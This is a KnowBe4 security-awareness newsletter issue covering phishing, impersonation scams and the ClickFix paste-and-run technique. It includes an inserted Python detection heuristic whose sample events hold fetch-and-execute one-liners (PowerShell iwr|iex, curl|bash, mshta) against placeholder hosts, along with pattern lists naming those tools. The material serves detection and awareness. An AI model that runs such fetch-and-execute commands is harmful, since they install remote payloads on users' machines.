CyberheistNews Vol 15 #27 | July 8th, 2025
Is Your Human Risk Management Program Really Making a Difference? Measure It Now.
Your employees are simultaneously your greatest vulnerability and your strongest line of defense. But here's the question: What metrics prove that your security awareness efforts are actually building a culture that protects your organization?
The Security Awareness Blind Spot
Many security leaders face a challenging reality:
- You invest in training without clear evidence of effectiveness
- You struggle to demonstrate the value of your program to leadership
- You're unsure which areas need your limited resources most
- You suspect gaps in your security culture but can't pinpoint them
- You know security frameworks exist, but they're too complex or technical
The result? Uncertainty that creates real risks for your org while bad actors exploit your blind spots every day.
Introducing the free KnowBe4 Program Maturity Assessment
To address these challenges, we've developed the Program Maturity Assessment (PMA), a free strategic tool that measures your effectiveness at managing human risk and building a strong security culture.
This simple five-minute assessment evaluates your organization across 40 Culture Maturity Indicators spanning ten critical dimensions:
- Leadership & Strategy: Executive communication and cybersecurity prioritization
- Employee-focused Security Tools: MFA, password managers and reporting tools
- Employee Mindset: Ownership of security and learning from mistakes
- Continuous Improvement: Knowledge sharing and program evolution
- Risk Awareness: Understanding risks and security impact
- Awareness & Behaviors: Relevant training and adoption of secure practices
- Policies & Procedures: Clear policies and efficient incident reporting
- Measurement & Metrics: Tracking effectiveness and security KPIs
- Employee Engagement: Participation in initiatives and recognition
- Integration with Business: Security embedded in daily processes
What You'll Get:
Based on your responses, you'll receive:
- Your Overall Maturity Classification on our five-level scale, from Basic Compliance (Level 1) to Sustainable Security Culture (Level 5)
- Detailed scoring for each dimension with specific strengths and improvement areas
- Visual ranking of your relative performance across all dimensions
- Prioritized recommendations for advancing to the next maturity level
- Practical actions you can implement immediately
Beyond Checkbox Compliance: Build a Real, Effective Security Culture
Unlike technical assessments or complex frameworks that speak in jargon, the PMA specifically addresses the human element of your security in plain English. It cuts through the complexity and gives you a clear path to build a security culture that actually works.
Whether you're just starting your security culture journey or looking to take an established program to the next level, the PMA gives you the structure and guidance needed to systematically strengthen your human defense layer.
Take the First Step Today
Transform your security awareness from checkbox compliance into a measurable culture that actually protects your organization against today's evolving human-targeted threats.
Complete the assessment and you'll immediately receive a comprehensive, actionable report outlining where you are and what key steps you should take to advance to the next level.
If this aligns with your organization's goals, you can schedule a call with our team to walk through how KnowBe4's HRM+ Platform can help improve your maturity and create a sustainable path forward.
Take the free assessment today:
https://www.knowbe4.com/free-cybersecurity-tools/program-maturity-assessment
[Live Demo] Ridiculously Easy AI-Powered Security Awareness Training and Phishing
Phishing and social engineering remain the #1 cyber threat to your organization, with 68% of data breaches caused by human error. Your security team needs an easy way to deliver personalized training; that is exactly what our AI Defense Agents provide.
Join us for a demo showcasing KnowBe4's innovative approach to human risk management with agentic AI that delivers personalized, relevant and adaptive security awareness training with minimal admin effort.
See how easy it is to train and phish your users with KnowBe4's HRM+ platform:
- SmartRisk Agent™ – Generate actionable data and metrics to help you lower your organization's human risk score
- Template Generator Agent – Create convincing phishing simulations, including Callback Phishing, that mimic real threats. The Recommended Landing Pages Agent then suggests appropriate landing pages based on AI-generated templates
- Automated Training Agent – Automatically identify high-risk users and assign personalized training
- Knowledge Refresher Agent and Policy Quizzes Agent – Reinforce your security program and organizational policies.
- Enhanced Executive Reports – Track user actions, visualize trends, download widgets, and improve searching/sorting to provide deeper insights and streamline collaboration
See how these powerful AI-driven features work together to dramatically reduce your organization's risk while saving your team valuable time.
Date/Time: TOMORROW, Wednesday, July 9, @ 2:00 PM (ET)
Save My Spot:
https://info.knowbe4.com/kmsat-demo-1?partnerref=CHN3
What Makes Southeast Asia the "Ground Zero of Cybercrime"?
By Bex Bailey
Our 2025 Phishing By Industry Benchmarking Report examines why organizations across Asia face some of the highest levels of cybersecurity risk worldwide.
In fact, Forrester finds that organizations in Asia Pacific (APAC) experience an average of 3.5 breaches within a 12-month period versus 2.8 globally. Organizations in the region also experience a cumulative cost of $2.8 million against the global mean of $2.7 million.
There are numerous factors that contribute to this elevated risk, from rapid, yet highly uneven, digital transformation, to an over-reliance on third-party suppliers (who are also undergoing their own digital transformations).
Other regions face similar challenges: organizations in Africa and South America, for example, also operate within complex maps of digitalization.
However, one factor we highlighted in the report is Southeast Asia's highly unique status as "Ground Zero" for cybercrime.
In October 2024, the United Nations Office on Drugs and Crime (UNODC) published a report stating that transnational organized crime in the region is evolving faster than ever before, with cyber-enabled fraud highlighted as one of two areas experiencing intense growth.
In fact, the UNODC estimates that victims in East and Southeast Asia have experienced financial losses between US$18 billion and US$37 billion related to cyber-enabled fraud.
Notably, the UNODC also states that a "predominant proportion" of these losses have been attributed to scams run by organized crime groups also located in Southeast Asia.
Several countries in Southeast Asia, particularly those in the Mekong region, have become a "testing ground" for transnational criminal networks, with Asian crime syndicates diversifying their "business lines" to now incorporate malware, generative AI, and deepfakes into their operations.
In a second report, published in April 2025, the UNODC describes how cyber-enabled fraud and scam centers have reached "industrial scale." Underpinning these activities are sophisticated and interconnected networks of money launderers, human traffickers, data brokers and other specialist service providers.
[CONTINUED]
https://blog.knowbe4.com/what-makes-southeast-asia-the-ground-zero-of-cybercrime
[NEW WEBINAR] Ransomware Reality Check: Busting Cybersecurity Myths
Join us for an engaging and interactive webinar where we put ransomware myths to the test! This unique session applies an analytical approach to the most persistent debates surrounding ransomware attacks, and YOU decide whether they hold weight.
KnowBe4 cybersecurity experts Javvad Malik and Erich Kron will go head-to-head to debate the facts, presenting evidence, real-world case studies and expert opinions on controversial ransomware topics. Should you:
- Ever negotiate with ransomware groups?
- Prioritize prevention or recovery?
- Be required to disclose ransom payments?
- Face legal penalties for making ransomware payments?
- Hire former black hat actors as consultants?
But here's where it gets interesting: YOU get the deciding vote! After each debate, you'll vote on which argument was most compelling and maybe even walk away thinking about ransomware in a new light. Plus, earn CPE credit for attending!
Date/Time: Wednesday, July 16 @ 2:00 PM (ET)
Can't attend live? No worries: register now and you'll receive a link to view the presentation on-demand afterwards.
Save My Spot:
https://info.knowbe4.com/ransomware-webinar-2025?partnerref=CHN
Crooks Are Using Generative AI to Craft Phishing Pages Almost Instantly
Researchers at Okta warn that cybercriminals are abusing a generative AI tool from Vercel to easily create credential-harvesting phishing pages. The tool, dubbed "v0," is designed to allow users to create websites via natural language prompts. Threat actors can use the tool to generate working phishing pages in under a minute.
"Okta Threat Intelligence has observed threat actors abusing v0, a breakthrough Generative Artificial Intelligence (GenAI) tool created by Vercel, to develop phishing sites that impersonate legitimate sign-in webpages," Okta writes.
"This observation signals a new evolution in the weaponization of Generative AI by threat actors who have demonstrated an ability to generate a functional phishing site from simple text prompts. Okta researchers were able to reproduce our observations."
Vercel has since blocked the sites and is working to prevent such misuse, but Okta notes that the activity shows that threat actors are eager to use AI tools to assist in their attacks.
"The observed activity confirms that today's threat actors are actively experimenting with and weaponizing leading GenAI tools to streamline and enhance their phishing capabilities," the researchers write. "The use of a platform like Vercel's v0.dev allows emerging threat actors to rapidly produce high-quality, deceptive phishing pages, increasing the speed and scale of their operations.
"In addition to Vercel's v0.dev platform, various public GitHub repositories offer direct clones of the v0.dev application or do-it-yourself (DIY) guides for building bespoke generative tools. This open-source proliferation effectively democratizes advanced phishing capabilities, providing the tools for adversaries to create their own phishing infrastructure."
New-school security awareness training gives your organization an essential layer of defense against evolving social engineering attacks. KnowBe4 empowers your workforce to make smarter security decisions every day. Over 70,000 organizations worldwide trust the KnowBe4 HRM+ platform to strengthen their security culture and reduce human risk.
Okta has the story:
https://www.okta.com/newsroom/articles/okta-observes-v0-ai-tool-used-to-build-phishing-sites/
Registration is Open for KB4-CON EMEA | London
Exciting news: registration is now open for KB4-CON EMEA, our premier event for IT and cybersecurity professionals! Join us 23 October, 2025, at 200 Aldersgate in London.
Explore the world of human risk management, AI and adaptive defense strategies at this annual conference where industry leaders gather to shape the future of security.
At KB4-CON, you'll:
- EXCEL: Dive deep into KnowBe4's product roadmap and latest updates
- GROW: Expand your security expertise and build valuable connections
- GET INSPIRED: Gain insights from top cybersecurity leaders and innovators
This is your opportunity to transform your approach to managing human risk and strengthen your security culture.
Save your spot today and secure early bird pricing of £69! Full price starting 1 August, 2025, is £99. Plus, take advantage of our buy 2 tickets, get 1 free offer and bring your colleagues to maximize your team's experience*.
Don't miss out on the cybersecurity event of the year!
Save My Spot!
https://knowbe4.cventevents.com/RMXXd0?RefId=CHN+E-mail
Warning: Impersonation Attacks Are Surging
Impersonation scams have risen by 148% over the past year, according to a new report from the Identity Theft Resource Center (ITRC). The majority of these scams posed as businesses or financial entities and attempted to trick victims into handing over credentials or other sensitive information.
"Scammers typically impersonated a business (51% of impersonation scams) or a financial institution (21%), with increased reports of impersonation in both categories," the report says. "While the next highest category of impersonation was a federal/state agency, there was a 32 percent (32%) decrease in reports of impersonation of a government agency compared to the same timeframe in the previous year."
The ITRC warns that cybercriminals are using AI tools to improve upon and scale their social engineering attacks. "Tactics used to lure victims into a scam include using AI to spoof legitimate websites, posting ads on search engines with fake customer service numbers for well-known businesses or sending legitimate-looking emails that pretend to be from a large company," the researchers write.
"They also send text messages that appear to come from legitimate sources. AI tools allow scammers to operate on a much larger scale and target more victims efficiently." The report adds that these attacks will only increase as AI tools grow more sophisticated.
"As AI-generated content becomes more realistic, it becomes harder to identify and block fraudulent attempts," the researchers write. "And the thieves don't just ask for money. They'll work to get as many personal identifiers as possible to take over accounts, establish new ones or sell the information to make money."
Infosecurity Magazine has the story:
https://www.infosecurity-magazine.com/news/reported-impersonation-scams-surge/
Let's stay safe out there.
Warm Regards,
Stu Sjouwerman, SACP
Founder and Exec Chair
KnowBe4, Inc.
PS: [INC Mag BUDGET AMMO] – Human Risk Management Can Fix the Most Unpatchable Threat:
https://www.inc.com/stu-sjouwerman/human-risk-management-can-fix-the-most-unpatchable-threat/91208814
Quotes of the Week
"If you light a lamp for someone else it will also brighten your path."
– Buddha (563 – 483 BC)
No one has ever become poor by giving.
– Anne Frank (1929 – 1945)
You can read CyberheistNews online at our Blog
https://blog.knowbe4.com/cyberheistnews-vol-15-27-is-your-human-risk-management-program-really-making-a-difference-measure-it-now
Security News
ClickFix Social Engineering Attacks Surge by More Than 500%
Researchers at ESET warn that the ClickFix social engineering tactic surged by 517% during the first six months of 2025. ClickFix is a technique that tricks users into copying, pasting and running malicious commands on their computers, usually resulting in malware installation.
"One of the most striking developments this period was the emergence of ClickFix, a new, deceptive attack vector that skyrocketed by over 500% compared to H2 2024 in ESET telemetry," ESET says. "Now the second most common attack vector after phishing, ClickFix manipulates internet users into executing malicious commands under the guise of fixing a fake error. The payloads at the end of ClickFix attacks vary widely – from infostealers to ransomware and even to nation-state malware – making this a versatile and formidable threat across Windows, Linux and macOS."
ClickFix will certainly continue growing in popularity, as the technique is now being incorporated into commodity phishing tools. Users across all operating systems should be aware of the tactic.
"While Windows users are the largest group affected, macOS and Linux users have also come into the crosshairs," ESET says. "For macOS, public reports show that ClickFix campaigns dropped AMOS stealer. For Linux, APT36 was seen redirecting victims to a counterfeit CAPTCHA page that instructed them to run the malicious code via the Alt+F2 shortcut that, on most Linux distributions, opens a Run Command dialog."
Dušan Lacika, a Senior Detection Engineer at ESET, explained, "What makes this new social engineering technique effective is that it is simple enough for the victim to follow the instructions, believable enough to seem like it might fix a made-up problem, and abuses the likelihood that victims won't pay much attention to the actual commands they've been asked to paste and execute on their machine. It's also a good example of how threat actors quickly adopt new techniques once they prove to yield results."
New-school security awareness training can help your employees defend themselves against evolving social engineering tactics. KnowBe4 empowers your workforce to make smarter security decisions every day.
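As an added illustration that is not part of the newsletter or ESET's research, the Python heuristic below shows how the paste-and-run pattern ESET describes (a command interpreter launched from a run prompt with a fetch-and-execute command line) could be triaged in endpoint process-creation telemetry. The event fields, the parent-process names taken to represent a run prompt (explorer.exe for Win+R, the desktop shell for Alt+F2) and the marker lists are assumptions, and the sample events are constructed.

```python
"""
Added example, not ESET's or KnowBe4's code: triage heuristic for
ClickFix-style executions in process-creation telemetry.
Assumptions: events carry the fields below; the interactive run prompt is
explorer.exe on Windows (Win+R) and the desktop shell behind Alt+F2 on
Linux; the marker lists are illustrative, not a complete detection rule.
"""
import re
from dataclasses import dataclass

# Interpreters a pasted ClickFix one-liner usually ends up in.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "bash", "sh", "zsh"}
# Parents that correspond to an interactive run prompt (assumption).
RUN_PROMPT_PARENTS = {"explorer.exe", "gnome-shell", "krunner", "xfce4-appfinder"}
# Fragments that fetch, decode or pipe remote content into execution.
FETCH_PATTERNS = [r"https?://", r"\biwr\b", r"invoke-webrequest", r"\biex\b",
                  r"invoke-expression", r"downloadstring", r"-enc\w*\b",
                  r"\|\s*(ba|z)?sh\b", r"\bcurl\b", r"\bwget\b"]


@dataclass
class ProcEvent:
    host: str
    parent_image: str   # basename of the parent process image
    image: str          # basename of the created process image
    command_line: str


def classify(ev: ProcEvent) -> str:
    """Return 'high', 'medium' or 'low' for one process-creation event."""
    cl = ev.command_line.lower()
    interp = ev.image.lower() in INTERPRETERS
    prompt = ev.parent_image.lower() in RUN_PROMPT_PARENTS
    fetch = any(re.search(p, cl) for p in FETCH_PATTERNS)
    if interp and prompt and fetch:
        return "high"      # fetch-and-run command pasted into a run prompt
    if fetch and (interp or prompt):
        return "medium"    # remote fetch, but not the full ClickFix shape
    return "low"           # e.g. a user simply opening cmd.exe via Win+R


def triage(events):
    """Return (host, severity, command_line) for every non-low event."""
    return [(e.host, classify(e), e.command_line)
            for e in events if classify(e) != "low"]


# Constructed sample telemetry; hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    ProcEvent("WS01", "explorer.exe", "powershell.exe",
              'powershell -NoProfile -Command "iwr https://example.invalid/fix | iex"'),
    ProcEvent("WS01", "explorer.exe", "cmd.exe", "cmd.exe"),
    ProcEvent("SRV02", "services.exe", "powershell.exe",
              r"powershell -File C:\ops\nightly-backup.ps1"),
    ProcEvent("LNX03", "gnome-shell", "sh",
              'sh -c "curl -s https://example.invalid/captcha | bash"'),
    ProcEvent("WS04", "outlook.exe", "mshta.exe",
              "mshta https://example.invalid/notice.hta"),
]

if __name__ == "__main__":
    for host, sev, cmd in triage(SAMPLE_EVENTS):
        print(f"{sev:6} {host:5} {cmd}")
```

Only the two run-prompt events with a remote fetch score high; the benign Win+R cmd.exe and the scheduled backup script stay low, and the mshta launch from a mail client lands in medium for analyst review.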
ESET has the story:
https://www.welivesecurity.com/en/eset-research/eset-threat-report-h1-2025/
Phishing Campaign Targets Investment Firms and Advisors
Phishing attacks are impersonating the U.S. Securities and Exchange Commission (SEC) to target SEC-registered financial services firms and advisors, according to an alert from ACA Group. The emails purport to come from the SEC's Chief Information Officer, and ask users to send a reply.
If a user responds, the scammers will target them with further attacks. "All messages claim to be from David Bottom, the Chief Information Officer at the SEC, though some messages truncate his last name," ACA Group says. "The messages ask the recipient to reply and confirm their email address to enable future secure communications.
"This is a common form of 'pretexting' that is used in phishing scams to verify active contacts and build trust in future interactions. Since this message was benign, the recipient is more likely to interact with the next message, which will likely redirect to a harmful website, trick them into downloading malware, or result in some other harm."
ACA Group offers the following advice to help users avoid falling for these attacks:
- "Not click any links in the email or open any attachments. Immediately escalate the issue to the firm's IT team.
- Not reply to or respond to the email.
- Confirm the validity of the email by contacting a trusted SEC representative using verified contact information. Do not use the details provided in the suspicious email—instead refer to contact information listed on the SEC's website or from another reliable source your firm already uses.
- Reach out to trusted cyber advisors to alert them of the issue and seek further guidance.
- Never trust the 'From' field in an email. Always check the email address itself and don't rely on the sender's name alone.
- Do not download attachments from an unsolicited source.
- Be wary of alarmist email subject lines (e.g., 'urgent', 'transfer', 'request', etc.).
- Create bookmarks for frequently visited websites to avoid visiting fake websites.
- Contact the IT department when in doubt about unknown and suspicious emails or links.
- Validate email requests with callbacks to a contact you have on file or visit a legitimate website to find a callback number."
KnowBe4 empowers your workforce to make smarter security decisions every day.
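To make the "check the address itself, not the sender's name" advice concrete, here is an added Python example (not ACA Group's or KnowBe4's code) that flags the header patterns of the reply-based SEC pretexting described above: a display name claiming an organization whose domain the sender address does not belong to, a Reply-To pointing elsewhere, and an alarmist subject line. The entity-to-domain map, the alarm-word list and the sample messages are constructed assumptions; sec.gov is the SEC's real domain.

```python
"""
Added example, not ACA Group's or KnowBe4's code: header checks for
reply-based pretexting emails. The entity map, alarm words and sample
messages are constructed; only sec.gov is a real value.
"""
import email
import re
from email.utils import parseaddr

# Display-name keywords mapped to the domain a genuine sender would use.
CLAIMED_ENTITY_DOMAINS = {
    "sec": "sec.gov",
    "securities and exchange commission": "sec.gov",
}
# Subject words ACA Group lists as alarmist, plus "confirm" for this campaign.
ALARM_WORDS = ("urgent", "transfer", "request", "confirm")


def _domain(addr: str) -> str:
    return addr.rsplit("@", 1)[1].lower() if "@" in addr else ""


def _same_org(domain: str, expected: str) -> bool:
    # Accept the domain itself and its subdomains (e.g. mail.sec.gov).
    return domain == expected or domain.endswith("." + expected)


def check_headers(raw: str) -> list[str]:
    """Return a list of findings; an empty list means no header red flags."""
    msg = email.message_from_string(raw)
    findings = []
    name, addr = parseaddr(msg.get("From", ""))
    from_domain = _domain(addr)
    # 1. Display name claims an organisation but the address lives elsewhere.
    for key, expected in CLAIMED_ENTITY_DOMAINS.items():
        if re.search(rf"\b{re.escape(key)}\b", name.lower()):
            if not _same_org(from_domain, expected):
                findings.append(f"display name claims '{key}' but sender "
                                f"domain is '{from_domain or 'missing'}'")
            break
    # 2. Replies are steered to a different domain than the visible sender.
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    if reply_addr and _domain(reply_addr) != from_domain:
        findings.append(f"Reply-To domain '{_domain(reply_addr)}' differs "
                        f"from From domain '{from_domain}'")
    # 3. Alarmist subject line.
    subject = msg.get("Subject", "").lower()
    hits = [w for w in ALARM_WORDS if re.search(rf"\b{w}\b", subject)]
    if hits:
        findings.append("alarmist subject words: " + ", ".join(hits))
    return findings


# Constructed samples; domains use reserved .invalid / .example names.
PHISH = """\
From: "SEC Chief Information Officer" <cio@sec-gov-notices.invalid>
Reply-To: "Secure Communications" <confirm@reply-relay.invalid>
Subject: Urgent request: confirm your email address
To: advisor@firm.example

Please reply to confirm this address for future secure communications.
"""
GENUINE = """\
From: "SEC Office of Information Technology" <oit@sec.gov>
Subject: Filing system maintenance window
To: advisor@firm.example

Scheduled maintenance notice.
"""
```

Run `check_headers(PHISH)` to see all three findings; the genuine-looking sample, whose display name claims the SEC and whose address is actually at sec.gov, produces none.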
ACA Group has the story:
https://www.acaglobal.com/industry-insights/active-phishing-campaign-impersonating-the-sec-firms-should-be-on-alert/
The 10 Interesting News Items This Week
Cyberheist 'Fave' Links